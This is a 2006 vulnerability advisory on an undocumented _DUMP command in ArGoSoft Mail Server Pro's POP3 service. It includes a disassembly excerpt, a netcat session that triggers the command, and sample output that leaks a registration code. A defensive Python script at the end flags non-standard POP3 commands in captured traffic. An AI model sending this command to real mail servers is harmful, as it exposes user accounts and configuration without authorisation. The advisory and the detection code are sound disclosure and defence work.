Advisory: NSAG-№201-24.02.2006
Research: NSA Group [Russian company for security auditing and network security]
Research site: http://www.nsag.ru or http://www.nsag.org
Product: ArGoSoft Mail Server Pro 1.8 POP
Manufacturer site: www.argosoft.com

Status:
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is notified.
16/02/2006 - No answer from the manufacturer.
16/02/2006 - Publication of the vulnerability.

Original Advisory: http://www.nsag.ru/vuln/879.html

Risk: Hide

Description: By executing the _DUMP command, a user gets access to private information.

Impact: A remote user gets access to the server configuration, the installed system, the registration information and the users' account records.

Code location where this command was found:

++++++++++++++++ Disassembler listing +++++++++++++++++++
CODE:0051AF65 D_DUMP:                         ; CODE XREF: D_POP3+F10j
CODE:0051AF65         lea     edx, [ebp+var_144]
CODE:0051AF6B         mov     eax, [ebp+var_8]
CODE:0051AF6E         call    sub_409DE0
CODE:0051AF73         mov     eax, [ebp+var_144]
CODE:0051AF79         mov     edx, offset a_dump ; "_DUMP"
CODE:0051AF7E         call    sub_405908
++++++++++++++++++++++++++++++++++++++++++++++++

Exploit:

M:\> nc.exe 192.168.1.1 110
+OK ArGoSoft Mail Server Pro for WinNT/2000/XP, Version 1.8 (1.8.8.1)
_DUMP

Abridged output:

+OK Information Follows
OS = Microsoft Windows 2000 Professional Service Pack 4 (Build 2195)
RegUserName = UserTester
RegCode = 917RCG790087CY4E

More information: http://www.nsag.ru/vuln/879.html

------------------------------------------------------------------------------------
Our company is an independent auditor of software on the IT market. Independent software audits are now becoming standard practice, and we offer to make a released product as protected as possible from various kinds of attacks by malicious actors!

www.nsag.ru
Nemesis Security Audit Group © 2006.
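
A defender can look for this kind of undocumented command in captured POP3 traffic or session logs. The Python below is an added example, not part of the original advisory or of the vendor's code; the `audit_session` function, the `(direction, text)` input format and the sample session are assumptions made for illustration, and pipelined commands are not modelled.

```python
# Added example (not from the advisory): audit a captured POP3 session for
# commands outside RFC 1939 / 2449 (CAPA) / 2595 (STLS) / 5034 (AUTH).
STANDARD = {"USER", "PASS", "APOP", "QUIT", "STAT", "LIST", "RETR", "DELE",
            "NOOP", "RSET", "TOP", "UIDL", "CAPA", "STLS", "AUTH"}
PRE_AUTH = {"USER", "PASS", "APOP", "QUIT", "CAPA", "STLS", "AUTH"}


def audit_session(lines):
    """lines: (direction, text) pairs, 'C' = client, 'S' = server."""
    findings, authenticated = [], False
    awaiting = None   # client command whose first reply line is pending
    pending = None    # finding waiting to learn if the server said +OK
    sasl = False      # inside an AUTH challenge/response exchange
    for n, (direction, text) in enumerate(lines, 1):
        if direction == "S":
            if awaiting is None:
                continue              # greeting or multi-line reply body
            if awaiting == "AUTH" and text.startswith("+ "):
                sasl = True           # challenge; next client line is data
                continue
            ok = text.startswith("+OK")
            if ok and awaiting in ("PASS", "APOP", "AUTH"):
                authenticated = True
            if pending is not None:
                pending["accepted"] = ok
            awaiting, pending, sasl = None, None, False
            continue
        if sasl or not text.strip():
            continue                  # SASL response data or empty line
        cmd = text.split()[0].upper()
        awaiting, pending = cmd, None
        if cmd not in STANDARD:
            reason = "non-standard command"
        elif not authenticated and cmd not in PRE_AUTH:
            reason = "transaction command before login"
        else:
            continue
        pending = {"line": n, "command": cmd, "reason": reason, "accepted": None}
        findings.append(pending)
    return findings


SAMPLE = [  # constructed session modelled on the transcript in this advisory
    ("S", "+OK ArGoSoft Mail Server Pro for WinNT/2000/XP, Version 1.8 (1.8.8.1)"),
    ("C", "_DUMP"),
    ("S", "+OK Information Follows"),
    ("S", "OS = (constructed placeholder)"),
]
print(audit_session(SAMPLE))
```

A finding with `accepted` set to `True` means the server answered the non-standard command with `+OK`, which is the case worth alerting on.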